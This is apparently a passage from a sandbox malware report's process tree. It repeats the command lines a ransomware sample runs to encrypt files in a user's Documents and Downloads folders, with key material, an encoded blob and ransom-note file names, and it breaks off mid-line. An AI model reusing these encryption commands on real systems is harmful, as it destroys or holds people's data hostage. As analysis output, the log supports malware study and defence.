C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\Restore-My-Files.txt"5⤵PID:5748
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\RGptjhh0-8d7JZWY0.[[email protected]].gif"5⤵PID:2368
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\ShowUpdate.docm.sage.gif"5⤵PID:5424
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\StepConvertTo.pot.sage.gif"5⤵PID:3100
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\StopSuspend.vsd.sage.gif"5⤵PID:2612
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\TraceWatch.potx.sage.gif"5⤵PID:3768
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\UlIOoJla-v5ZPQHqO.[[email protected]].gif"5⤵PID:3444
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\UnblockCopy.pps.sage.gif"5⤵PID:6316
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\UnregisterUpdate.xla.sage.gif"5⤵PID:7052
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\WriteResume.vsw.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7048
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\!HELP_SOS.hta.gif"5⤵PID:5908
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\#Decrypt_Files_ReadMe#.rtf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4688
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\ApproveLimit.ini.sage.gif"5⤵PID:944
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\BackupUpdate.vst.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6696
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\CloseNew.jpeg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6456
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\CompleteGet.vstx.sage.gif"5⤵PID:6300
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\CompressSuspend.mp4v.sage.gif"5⤵PID:1952
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\ConvertReset.pub.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6916
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\ConvertToPop.xlt.sage.gif"5⤵PID:1304
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\CopyStart.wmx.sage.gif"5⤵PID:6404
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\DebugFormat.scf.gif"5⤵PID:1352
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:2724
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\ExitGrant.php.sage.gif"5⤵PID:1312
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" 